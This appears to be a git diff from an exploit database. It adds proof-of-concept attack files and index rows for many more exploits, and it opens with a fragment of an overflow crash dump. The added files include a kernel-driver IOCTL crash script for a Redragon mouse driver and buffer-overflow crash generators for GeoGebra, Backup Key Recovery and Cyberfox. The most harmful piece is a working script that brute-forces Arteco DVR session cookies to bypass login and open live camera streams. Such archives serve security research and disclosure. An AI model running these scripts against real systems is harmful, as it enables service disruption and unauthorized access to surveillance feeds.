41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141
41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141
41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141
00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141
00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f
00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0

32
exploits/windows/dos/50322.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
# Date: 27/08/2021
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.redragonzone.com/pages/download
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE
import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv
devicename = "REDRAGON_MOUSE"
ioctl = 0x222414
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print ("Not Win! Sorry!")
else:
print ("OPENED!")
buf = '\x44' * 1000 + '\x00' * 1000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)

26
exploits/windows/local/49653.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinegraphing
# Tested on: Windows 8.1 Pro
# STEPS
# Open the program Graficadora
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

26
exploits/windows/local/49654.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 5.0.631.0-d
# Tested on: Windows 8.1 Pro
#STEPS
# Open the program GeoGebra
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content in the field "Entrada:"
# Crashed
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 800000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

26
exploits/windows/local/49655.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinecas
# Tested on: Windows 8.1 Pro
# STEPS
# Open the program Calculadora CAS
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

21
exploits/windows/local/49966.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Version: 2.2.7.0
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open BackupKeyRecovery.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

31
exploits/windows/local/50014.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path
# Discovery by: BRushiran
# Date: 15-06-2021
# Vendor Homepage: https://www.disksorter.com
# Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe
# Tested Version: 13.6.12
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Disk Sorter Enterprise Disk Sorter Enterprise C:\Program Files\Disk
Sorter Enterprise\bin\disksrs.exe Auto
C:\>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Disk Sorter Enterprise
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
Enterprise\bin\disksrs.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Disk Sorter Enterprise
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

27
exploits/windows/local/50336.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
# Date: 2021-09-26
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cyberfox.8pecxstudios.com
# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows
#[ About - Cyberfox ] :
#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture
#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.
# [ Exploit/POC ] :
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Cyberfox Web Browser
# 3.Copy the content of the file "output.txt" & Paste into the "search bar"
# 4.Crashed
Overflow = "\x41" * 9000000
try:
f=open("output.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(Overflow))
f.write(Overflow)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")

100
exploits/windows/webapps/49348.py Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
# Date: 16.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.arteco-global.com
#!/usr/bin/env python3
#
#
# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
#
#
# Vendor: Arteco S.U.R.L.
# Product web page: https://www.arteco-global.com
# Affected version: n/a
#
# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
# ideal for those who need to manage IP video surveillance designed for
# medium to large installations that require high performance and reliability.
# Arteco can handle IP video sources from all major international manufacturers
# and is compatible with ONVIF and RTSP devices.
#
# Desc: The Session ID 'SessionId' is of an insufficient length and can be
# exploited by brute force, which may allow a remote attacker to obtain a
# valid session, bypass authentication and disclose the live camera stream.
#
# Tested on: Microsoft Windows 10 Enterprise
# Apache/2.4.39 (Win64) OpenSSL/1.0.2s
# Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
# Arteco-Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5613
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
#
#
# 16.11.2020
#
import sys,requests
class BrutusCookius:
def __init__(self):
self.validate=None
self.cookies=None#
self.params=None##
self.stream=None##
self.path=None####
self.cgi=None#####
self.ip=None######
self.op=None######
def check(self):
print('Usage: ./arteco.py IP')
exit(9)
def bro(self):
if len(sys.argv) !=2:
self.check()
else:
self.ip=sys.argv[1]
print('[+] Target IP: '+self.ip)
if not 'http' in self.ip:
self.ip='http://{}'.format(self.ip)
def force(self):
# Check the Set-Cookie on the target and determine the length (varies per model/version)
# Cookie: SessionId=15800 - range(10000,100000)
# Cookie: SessionId=8350 - range(1000,10000)
# Cookie: SessionId=502 - range(100,1000)
self.op = range(17129,17149) # Tweak
for j in self.op:
session=requests.session()
self.cookies=dict(SessionId=str(j))
sys.stdout.write('[+] Trying ID: '+str(j))
self.path='/arteco-mobile/'
self.cgi='camera.fcgi'
self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
if not 'artecomobile' in str(self.validate):
print(' - NOPE.')
else:
print(' - BINGO!!!')
print('[+] Active session found: '+str(j))
print('[+] Use the cookie: SessionId='+str(j))
exit(9)
print('[!] Sorry, no valid session found.')
def main(self):
self.bro()
self.force()
if __name__ == '__main__':
BrutusCookius().main()

53
files_exploits.csv
View file

@ -5252,6 +5252,7 @@ id,file,description,date,author,type,platform,port
40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx,
40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows,
43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows,
50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows,
43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows,
43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows,
@ -6767,8 +6768,22 @@ id,file,description,date,author,type,platform,port
49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple,
49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows,
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
@ -11279,6 +11294,9 @@ id,file,description,date,author,type,platform,port
49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows,
49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows,
49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows,
49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",1970-01-01,"Paolo Stagno",local,windows,
49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows,
49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",1970-01-01,"Metin Yunus Kandemir",local,windows,
@ -11317,6 +11335,8 @@ id,file,description,date,author,type,platform,port
49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",1970-01-01,"Geovanni Ruiz",local,windows,
50061,exploits/windows/local/50061.txt,"SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",1970-01-01,"Austin Babcock",local,windows,
49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",local,windows,
49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",local,ios,
49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
@ -11326,6 +11346,7 @@ id,file,description,date,author,type,platform,port
50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",1970-01-01,"J Smith",local,linux,
50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",1970-01-01,BRushiran,local,windows,
50014,exploits/windows/local/50014.txt,"Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path",1970-01-01,BRushiran,local,windows,
50023,exploits/windows/local/50023.txt,"Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
50024,exploits/windows/local/50024.txt,"Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
@ -11348,6 +11369,7 @@ id,file,description,date,author,type,platform,port
50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python,
50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows,
50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
@ -18475,6 +18497,8 @@ id,file,description,date,author,type,platform,port
49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",1970-01-01,scryh,remote,linux,
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",1970-01-01,"Christopher Ellis",remote,java,
49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",1970-01-01,1F98D,remote,windows,
49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",1970-01-01,LiquidWorm,remote,hardware,
49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",1970-01-01,xynmaps,remote,multiple,
49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple,
49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple,
49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux,
@ -18483,6 +18507,7 @@ id,file,description,date,author,type,platform,port
49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris,
49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux,
49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware,
50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",1970-01-01,"Mohammed Hadi",remote,hardware,
50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",1970-01-01,"Nathaniel Singer",remote,solaris,
50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",1970-01-01,"Nehal Zaman",remote,android,
50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",1970-01-01,Gr33nh4t,remote,hardware,
@ -26033,8 +26058,10 @@ id,file,description,date,author,type,platform,port
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple,
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php,
50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php,
49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php,
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php,
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80
30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php,
18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",1970-01-01,n0tch,webapps,php,
@ -43734,7 +43761,9 @@ id,file,description,date,author,type,platform,port
49345,exploits/php/webapps/49345.txt,"CMS Made Simple 2.2.15 - RCE (Authenticated)",1970-01-01,"Andrey Stoykov",webapps,php,
49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",1970-01-01,icekam,webapps,php,
49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,multiple,
